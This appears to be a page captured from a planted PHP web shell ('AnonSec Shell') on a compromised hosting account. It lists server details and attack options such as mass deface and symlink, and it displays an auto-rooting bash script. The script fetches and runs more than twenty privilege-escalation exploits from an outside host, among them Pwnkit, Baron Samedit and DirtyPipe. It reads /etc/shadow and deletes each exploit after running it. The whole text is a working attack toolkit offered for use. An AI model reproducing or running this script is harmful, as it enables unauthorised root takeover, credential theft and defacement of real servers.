AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 172.71.28.146   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/redbag/wal_banner/a/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/simded.com/redbag/wal_banner/a/root.sh
#!/bin/bash

RED='\033[91m'
ENDCOLOR='\033[0m'

echo "************************************************************"
echo -e "${RED}Auto Rooting Server By: đź’€Seobarbar1337-TegalXploiter-7Syndicateđź’€${ENDCOLOR}"
echo -e "${RED}Blog: https://www.xploit.info${ENDCOLOR}"
echo "************************************************************"

check_root() {
    if [ $(id -u) -eq 0 ]; then
        echo
        echo "Successfully Get Root Access"
        echo "ID     => $(id -u)"
        echo "WHOAMI => $USER"
        echo
        exit
    fi
}

check_pkexec_version() {
    output=$(pkexec --version)
    version=""
    while IFS= read -r line; do
        if [[ $line == "pkexec version"* ]]; then
            version="${line##* }"
            break
        fi
    done <<< "$output"
    echo "$version"
}

run_commands_with_pkexec() {
    pkexec_version=$(check_pkexec_version)
    echo "pkexec version: $pkexec_version"

    if [[ $pkexec_version == "0.105" || $pkexec_version == "0.96" || $pkexec_version == "0.95" || $pkexec_version == "0.096" ]]; then
        wget -q "https://0-gram.github.io/id-0/exp_file_credential" --no-check-certificate
        chmod 777 "exp_file_credential"
        ./exp_file_credential
        check_root
        rm -f "exp_file_credential"
        rm -rf "exp_dir"
    else
        echo "pkexec ora supported"
    fi
}

run_commands_with_pkexec

echo "đź’€Menjalankan Pwnkit....đź’€"
wget -q "https://0-gram.github.io/id-0/ak" --no-check-certificate
chmod 777 "ak"
./ak
check_root
rm -f "ak"
rm -rf "GCONV_PATH=."
rm -rf ".pkexec"

echo "đź’€Menjalankan sudo barron samedit....đź’€"
wget -q "https://0-gram.github.io/id-0/exploit_userspec.py" --no-check-certificate
chmod 777 "exploit_userspec.py"
python exploit_userspec.py
check_root
rm -f "exploit_userspec.py"
rm -f "0"
rm -f "kmem"
rm -f "sendfile1"

echo "đź’€Menjalankan CVE-2022-0847-DirtyPipe-Exploitsđź’€"
wget -q "https://0-gram.github.io/id-0/CVE-2022-0847-DirtyPipe-Exploits/a2.out" --no-check-certificate
chmod 777 "a2.out"
find / -perm 4000 -type -f 2>/dev/null || find / -perm -u=s -type -f 2>/dev/null
./a2.out /usr/bin/sudo
check_root
./a2.out /usr/bin/passwd
check_root
rm -f "a2.out"

echo "đź’€Menjalankan dirtypipe cve-2022-0847....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/sudodirtypipe
chmod 777 sudodirtypipe
./sudodirtypipe /usr/local/bin
check_root
rm sudodirtypipe

echo "đź’€Menjalankan af_packet....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/af_packet
chmod 777 af_packet
./af_packet
check_root
rm af_packet

echo "đź’€Menjalankan CVE-2015-1328 / overlayfs....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2015-1328
chmod 777 CVE-2015-1328
./CVE-2015-1328
check_root
rm CVE-2015-1328

echo "đź’€Menjalankan CAP_NET_ADMIN / CVE-2016-9793....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2016-9793
chmod 777 CVE-2016-9793
./CVE-2016-9793
check_root
rm CVE-2016-9793

echo "đź’€Menjalankan Ptrace....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/ptrace
chmod 777 ptrace
./ptrace
check_root
rm ptrace

echo "đź’€Menjalankan CVE-2017-16995....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/cve-2017-16995
chmod 777 cve-2017-16995
./cve-2017-16995
check_root
rm cve-2017-16995

echo "đź’€Menjalankan exploit-debian....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/exploit-debian
chmod 777 exploit-debian
./exploit-debian
check_root
rm exploit-debian

echo "đź’€Menjalankan exploit-ubuntu....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/exploit-ubuntu
chmod 777 exploit-ubuntu
./exploit-ubuntu
check_root
rm exploit-ubuntu

echo "đź’€Menjalankan newpid.....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/newpid
chmod 777 newpid
./newpid
check_root
rm newpid

echo "đź’€Menjalankan CVE-2015-1862....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/raceabrt
chmod 777 raceabrt
./raceabrt
check_root
rm raceabrt

echo "đź’€Menjalankan CVE-2014-0038....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/timeoutpwn
chmod 777 timeoutpwn
./timeoutpwn
check_root
rm timeoutpwn

echo "đź’€Menjalankan Ubuntu 16.04.4 kernel priv esc....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/upstream44
chmod 777 upstream44
./upstream44
check_root
rm upstream44

echo "đź’€Menjalankan lpe exploit / CVE-2022-37706....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/lpe.sh
chmod 777 lpe.sh
head -2 /etc/shadow
./lpe.sh
check_root
rm lpe.sh

echo "đź’€Menjalankan usb mini....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/a.out
chmod 777 a.out
./a.out 0 && ./a.out 1
check_root
rm a.out

echo "đź’€Menjalankan cve-2017-1000367.....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/linux_sudo_cve-2017-1000367
chmod 777 linux_sudo_cve-2017-1000367
./linux_sudo_cve-2017-1000367
check_root
rm linux_sudo_cve-2017-1000367

echo "đź’€Menjalankan CVE-2021-3493 / OverlayFS....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/overlayfs
chmod 777 overlayfs
./overlayfs
check_root
rm overlayfs

echo "đź’€Menjalankan SocketPacket/CVE-2017-7308đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2017-7308
chmod 777 CVE-2017-7308
./CVE-2017-7308
check_root
rm CVE-2017-7308

echo "đź’€Menjalankan CVE-2022-2639....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2022-2639
chmod 777 CVE-2022-2639
./CVE-2022-2639
check_root
rm CVE-2022-2639

echo "đź’€Menjalankan CVE-2011-1485/polkit-pwnage....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/polkit-pwnage
chmod 777 polkit-pwnage
./polkit-pwnage
check_root
rm polkit-pwnage

echo "đź’€Menjalankan CVE-2018-100000.....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/RationalLove
chmod 777 RationalLove
./RationalLove
check_root
rm RationalLove

Anon7 - 2022
AnonSec Team